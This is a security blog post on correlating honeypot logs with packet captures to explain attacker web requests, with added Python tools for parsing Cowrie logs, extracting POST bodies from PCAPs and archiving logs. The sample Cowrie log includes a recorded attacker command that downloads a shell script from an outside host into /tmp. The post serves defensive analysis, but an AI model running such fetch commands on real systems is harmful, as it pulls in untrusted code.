Is that It? Finding the Unknown: Correlations Between Honeypot Logs & PCAPs

Simply parsing through the logs may not always give you a complete picture.
This blog post walks through the steps I have taken to build a bigger picture for an attack observation, briefly going over the evidence sources involved: malicious files, HTTP requests, Cowrie and web honeypot JSON logs, and PCAPs.
Reviewing the Cowrie JSON logs pulls everything, with all relevant details for each IP address, into a format I feel is a bit easier to follow.
Some data may not always populate in the SIEM, so it isn't a bad idea to review the raw logs on the honeypot to confirm what you are seeing.
You could also parse through the logs manually to get similar data.
For me, reviewing these requests on the SIEM or parsing through the logs still didn't answer why.
Since the SIEM wasn't cutting it for me with web requests, I turned to the logs from the sensors to manually parse.
Parsing the logs reveals a lot of detail about a given IP address or even about individual web requests.
Once you understand the structure of the JSON files, it is simple to parse the logs based on just about any search criteria.
Aside from manually parsing the files as I did with the Telnet/SSH logs, I created a script specific to the format of these web logs.
While the web logs provide a lot of detail, this goes back to what I mentioned earlier: something still seemed to be missing when it came to answering the question of why these URLs are being accessed.
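The per-IP roll-up and search described above, as an added example that is not the diary author's script: it reads Cowrie's JSON-lines output (the `eventid`, `src_ip`, `session`, `username`, `password` and `input` fields are Cowrie's real names), skips lines that do not parse, folds every event into one record per source IP, and filters on arbitrary field/value criteria. The log lines are constructed for the example, not real captures; point `parse_cowrie` at the contents of `cowrie.json` on a sensor to use it for real.

```python
import json
from collections import defaultdict

# Constructed sample in Cowrie's JSON-lines format (one event per line). Not real
# captures; the field names (eventid, src_ip, session, ...) are Cowrie's own.
SAMPLE_COWRIE_LOG = """\
{"eventid": "cowrie.session.connect", "src_ip": "203.0.113.7", "src_port": 51234, "dst_ip": "10.0.0.5", "dst_port": 2222, "session": "a1b2c3d4e5f6", "protocol": "ssh", "timestamp": "2024-05-01T10:00:01.000000Z"}
{"eventid": "cowrie.login.failed", "src_ip": "203.0.113.7", "username": "root", "password": "123456", "session": "a1b2c3d4e5f6", "timestamp": "2024-05-01T10:00:02.000000Z"}
{"eventid": "cowrie.login.success", "src_ip": "203.0.113.7", "username": "root", "password": "admin", "session": "a1b2c3d4e5f6", "timestamp": "2024-05-01T10:00:03.000000Z"}
{"eventid": "cowrie.command.input", "src_ip": "203.0.113.7", "input": "uname -a", "session": "a1b2c3d4e5f6", "timestamp": "2024-05-01T10:00:04.000000Z"}
{"eventid": "cowrie.command.input", "src_ip": "203.0.113.7", "input": "wget http://198.51.100.9/x.sh -O /tmp/x.sh", "session": "a1b2c3d4e5f6", "timestamp": "2024-05-01T10:00:05.000000Z"}
{"eventid": "cowrie.session.closed", "src_ip": "203.0.113.7", "session": "a1b2c3d4e5f6", "duration": 4.9, "timestamp": "2024-05-01T10:00:06.000000Z"}
{"eventid": "cowrie.session.connect", "src_ip": "198.51.100.22", "src_port": 40000, "dst_ip": "10.0.0.5", "dst_port": 2222, "session": "ffff00001111", "protocol": "ssh", "timestamp": "2024-05-01T11:00:00.000000Z"}
{"eventid": "cowrie.login.failed", "src_ip": "198.51.100.22", "username": "admin", "password": "admin", "session": "ffff00001111", "timestamp": "2024-05-01T11:00:01.000000Z"}
this line is truncated garbage, as happens when a log rotates mid-write
"""


def parse_cowrie(text):
    """Parse JSON-lines text into event dicts, skipping lines that are not valid JSON."""
    events = []
    for lineno, line in enumerate(text.splitlines(), 1):
        line = line.strip()
        if not line:
            continue
        try:
            events.append(json.loads(line))
        except json.JSONDecodeError:
            # Keep going: one bad line should not cost you the rest of the day's data.
            print(f"skipping unparseable line {lineno}")
    return events


def search(events, **criteria):
    """Events whose fields equal every criterion, e.g. search(ev, src_ip="203.0.113.7")."""
    return [e for e in events if all(e.get(k) == v for k, v in criteria.items())]


def summarize_by_ip(events):
    """Fold all events into one record per source IP: sessions, credentials, commands, timespan."""
    per_ip = defaultdict(lambda: {
        "sessions": set(), "failed_logins": [], "successful_logins": [],
        "commands": [], "first_seen": None, "last_seen": None,
    })
    for e in sorted(events, key=lambda e: e.get("timestamp", "")):
        ip = e.get("src_ip")
        if ip is None:
            continue
        rec = per_ip[ip]
        ts = e.get("timestamp")
        rec["first_seen"] = rec["first_seen"] or ts
        rec["last_seen"] = ts or rec["last_seen"]
        if "session" in e:
            rec["sessions"].add(e["session"])
        eid = e.get("eventid", "")
        if eid == "cowrie.login.failed":
            rec["failed_logins"].append((e.get("username"), e.get("password")))
        elif eid == "cowrie.login.success":
            rec["successful_logins"].append((e.get("username"), e.get("password")))
        elif eid == "cowrie.command.input":
            rec["commands"].append(e.get("input"))
    # Turn the session sets into counts so the result is plain, printable data.
    for rec in per_ip.values():
        rec["sessions"] = len(rec["sessions"])
    return dict(per_ip)


if __name__ == "__main__":
    evs = parse_cowrie(SAMPLE_COWRIE_LOG)
    for ip, rec in summarize_by_ip(evs).items():
        print(ip, json.dumps(rec))
    for e in search(evs, eventid="cowrie.command.input"):
        print(e["timestamp"], e["src_ip"], e["input"])
```

The sort by timestamp matters when you concatenate several days of rotated files, since rotation does not guarantee order; the tolerant parser matters for exactly the truncated, about-to-be-deleted files the diary mentions later.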
Reviewing the logs alone provides only so much insight into what a threat actor is doing on the honeypot.
What you don't get from the honeypot's web logs is any indication of what the threat actor may actually be doing - at least not from what I was able to observe.
Going back to how Daemonlogger is set up, it writes one PCAP file into a daily folder.
Parsing through the honeypot logs, I couldn't find any correlation for that command.
Without the PCAP, all you would find in the logs is that the HTTP request method is POST and the URL is /device; the request body that carried the command is only in the capture.
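The log-to-PCAP correlation above, as an added example that is not the diary author's code. It assumes the web honeypot log is JSON lines with `time`, `sip`, `dip`, `method` and `url` fields (an assumption for the example, not the sensor's exact schema) and that the Daemonlogger file is a classic libpcap capture with Ethernet framing. For every logged POST it finds the TCP segment from the same source to the same destination on a web port within a few seconds of the log time, checks that the request line names the logged URL, and returns the request body the log never kept. The capture is constructed inline with a made-up body so the example runs offline; on a sensor, pass `open(path, "rb").read()` of the day's file instead.

```python
import json
import socket
import struct
from datetime import datetime, timezone

# Constructed web-honeypot log entries. The field names (time, sip, dip, method, url)
# are an assumption for this example, not the sensor's exact schema.
SAMPLE_WEB_LOG = """\
{"time": "2024-05-01T10:00:05Z", "sip": "203.0.113.7", "dip": "10.0.0.5", "method": "POST", "url": "/device"}
{"time": "2024-05-01T10:02:00Z", "sip": "198.51.100.22", "dip": "10.0.0.5", "method": "GET", "url": "/"}
"""
WEB_PORTS = {80, 8080}


def log_time_to_epoch(value):
    """UTC log timestamp string -> epoch seconds, the unit pcap record headers use."""
    return int(datetime.strptime(value, "%Y-%m-%dT%H:%M:%SZ")
               .replace(tzinfo=timezone.utc).timestamp())


def iter_tcp_payloads(pcap_bytes):
    """Walk a classic libpcap file (Ethernet link type) and yield TCP segments carrying data."""
    magic, = struct.unpack("<I", pcap_bytes[:4])
    if magic == 0xA1B2C3D4:
        endian = "<"
    elif magic == 0xD4C3B2A1:
        endian = ">"
    else:
        raise ValueError("not a classic pcap file (pcapng is not handled here)")
    linktype, = struct.unpack(endian + "I", pcap_bytes[20:24])
    if linktype != 1:
        raise ValueError("only Ethernet (LINKTYPE 1) captures are handled")
    off = 24
    while off + 16 <= len(pcap_bytes):
        ts_sec, _usec, incl_len, _orig = struct.unpack(endian + "IIII", pcap_bytes[off:off + 16])
        off += 16
        frame = pcap_bytes[off:off + incl_len]   # a truncated last record just ends the loop
        off += incl_len
        if len(frame) < 34 or frame[12:14] != b"\x08\x00":   # IPv4 only
            continue
        ip = frame[14:]
        ihl = (ip[0] & 0x0F) * 4
        total_len, = struct.unpack("!H", ip[2:4])
        tcp = ip[ihl:total_len]
        if ip[9] != 6 or len(tcp) < 20:                       # TCP only
            continue
        sport, dport = struct.unpack("!HH", tcp[:4])
        payload = tcp[(tcp[12] >> 4) * 4:]
        if payload:
            yield {"ts": ts_sec, "src": socket.inet_ntoa(ip[12:16]), "sport": sport,
                   "dst": socket.inet_ntoa(ip[16:20]), "dport": dport, "payload": payload}


def correlate_posts(web_log_text, pcap_bytes, window_s=5):
    """For each POST in the honeypot log, pull the request body out of the PCAP.
    Match on src/dst IP, a web port and a time window, then require the request
    line to name the logged URL. Returns {(sip, url): body_text}."""
    entries = [json.loads(l) for l in web_log_text.splitlines() if l.strip()]
    segments = list(iter_tcp_payloads(pcap_bytes))
    found = {}
    for w in (e for e in entries if e["method"] == "POST"):
        t0 = log_time_to_epoch(w["time"])
        for seg in segments:
            if (seg["src"], seg["dst"]) != (w["sip"], w["dip"]) or seg["dport"] not in WEB_PORTS:
                continue
            if abs(seg["ts"] - t0) > window_s:
                continue
            head, sep, body = seg["payload"].partition(b"\r\n\r\n")
            if sep and head.split(b"\r\n", 1)[0].startswith(b"POST " + w["url"].encode() + b" "):
                found[(w["sip"], w["url"])] = body.decode("utf-8", "replace")
    return found


def build_frame(src_ip, sport, dst_ip, dport, payload, ts_sec):
    """One pcap record: Ethernet + minimal IPv4 + minimal TCP + payload (checksums left zero)."""
    eth = bytes.fromhex("001122334455" "66778899aabb" "0800")
    tcp = struct.pack("!HHIIBBHHH", sport, dport, 1, 1, 5 << 4, 0x18, 65535, 0, 0)
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + len(tcp) + len(payload), 0, 0, 64, 6, 0,
                     socket.inet_aton(src_ip), socket.inet_aton(dst_ip))
    frame = eth + ip + tcp + payload
    return struct.pack("<IIII", ts_sec, 0, len(frame), len(frame)) + frame


def build_sample_pcap():
    """Constructed capture: the POST /device we want plus two packets that must not match."""
    t = log_time_to_epoch("2024-05-01T10:00:05Z")
    body = b"cmd=uname+-a"   # constructed body, not something the diary reports
    post = (b"POST /device HTTP/1.1\r\nHost: 10.0.0.5\r\nContent-Type: application/x-www-form-urlencoded\r\n"
            b"Content-Length: " + str(len(body)).encode() + b"\r\n\r\n" + body)
    header = struct.pack("<IHHiIII", 0xA1B2C3D4, 2, 4, 0, 0, 65535, 1)
    return (header
            + build_frame("203.0.113.7", 51000, "10.0.0.5", 80, post, t)
            + build_frame("203.0.113.7", 51001, "10.0.0.5", 2222, b"SSH-2.0-x\r\n", t)   # not a web port
            + build_frame("198.51.100.22", 40000, "10.0.0.5", 80, b"GET / HTTP/1.1\r\n\r\n", t + 115))


if __name__ == "__main__":
    for key, body in correlate_posts(SAMPLE_WEB_LOG, build_sample_pcap()).items():
        print(key, "->", body)
```

Two caveats a practitioner will hit: this does no TCP stream reassembly, so a body that spans several segments (or a request split from its headers) will not be found and needs a tool such as Wireshark's Follow TCP Stream or tshark instead; and the time window only works if the sensor's log clock and the capture clock agree, so check the timezone of the log timestamps before widening `window_s` to paper over a mismatch.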
If you didn't catch the details regarding data retention on the sensor at the start of the internship: the sensor deletes its logs at set intervals.
If you want long-term retention of any of the logs, set up an automatic transfer of the logs to a separate system, or at least to a separate folder on the sensor.
My first or second attack observation included some logs that just so happened to be at the tail end of when they are deleted.
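One way to do that automatic transfer, as an added example rather than anything the diary or the DShield project ships: copy matching log and PCAP files into a retention folder, verify each copy by SHA-256, and keep a manifest so that re-running from cron is idempotent and a later altered or truncated archive can be detected. The file-name patterns (`cowrie.json*`, `webhoneypot-*.json`, `*.pcap*`) and the directory layout are assumptions for the example; `demo()` builds a throwaway sensor tree so it runs anywhere.

```python
import hashlib
import json
import shutil
import tempfile
from pathlib import Path


def sha256_of(path):
    h = hashlib.sha256()
    with open(path, "rb") as fh:
        for chunk in iter(lambda: fh.read(1 << 16), b""):
            h.update(chunk)
    return h.hexdigest()


def archive_logs(src_dir, dst_dir, patterns=("cowrie.json*", "webhoneypot-*.json", "*.pcap*")):
    """Copy honeypot logs/PCAPs to a retention folder, skipping files already archived unchanged.

    manifest.json in dst_dir records relative path -> sha256, so re-runs only copy new or
    grown files and you can later check whether an archived file still matches.
    The patterns are assumed file names for this example; adjust them to your sensor.
    """
    src, dst = Path(src_dir), Path(dst_dir)
    dst.mkdir(parents=True, exist_ok=True)
    manifest_path = dst / "manifest.json"
    manifest = json.loads(manifest_path.read_text()) if manifest_path.exists() else {}
    copied = []
    for pattern in patterns:
        for f in sorted(src.rglob(pattern)):
            if not f.is_file():
                continue
            rel = f.relative_to(src).as_posix()   # keeps the daily folder layout
            digest = sha256_of(f)
            if manifest.get(rel) == digest:
                continue                          # unchanged since the last run
            target = dst / rel
            target.parent.mkdir(parents=True, exist_ok=True)
            shutil.copy2(f, target)               # copy2 preserves mtime for later timelines
            if sha256_of(target) != digest:
                raise IOError(f"copy of {rel} did not verify")
            manifest[rel] = digest
            copied.append(rel)
    manifest_path.write_text(json.dumps(manifest, indent=1, sort_keys=True))
    return copied


def demo():
    """Build a throwaway sensor layout, archive it twice, grow one log, archive again."""
    with tempfile.TemporaryDirectory() as tmp:
        sensor = Path(tmp) / "sensor"
        (sensor / "2024-05-01").mkdir(parents=True)
        (sensor / "cowrie.json.2024-05-01").write_text('{"eventid": "cowrie.session.connect"}\n')
        (sensor / "2024-05-01" / "daemonlogger.pcap").write_bytes(b"\xd4\xc3\xb2\xa1" + b"\x00" * 20)
        (sensor / "webhoneypot-2024-05-01.json").write_text("{}\n")
        (sensor / "notes.txt").write_text("not a log, should be ignored\n")
        archive = Path(tmp) / "retained"
        first = archive_logs(sensor, archive)
        second = archive_logs(sensor, archive)     # nothing changed: no copies
        with open(sensor / "cowrie.json.2024-05-01", "a") as fh:
            fh.write('{"eventid": "cowrie.session.closed"}\n')
        third = archive_logs(sensor, archive)      # only the grown file is re-copied
        manifest = json.loads((archive / "manifest.json").read_text())
        return {"first": first, "second": second, "third": third,
                "archived_names": sorted(manifest)}


if __name__ == "__main__":
    print(json.dumps(demo(), indent=1))
```

Run it from cron a little more often than the sensor's cleanup interval, with the retention folder outside the directories that cleanup touches or, better, on another host. Note that an open, still-growing log is copied as it is at that moment; the next run picks up the rest because the hash changes.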


This Cyber News was published on isc.sans.edu. Publication date: Wed, 29 May 2024 01:13:14 +0000

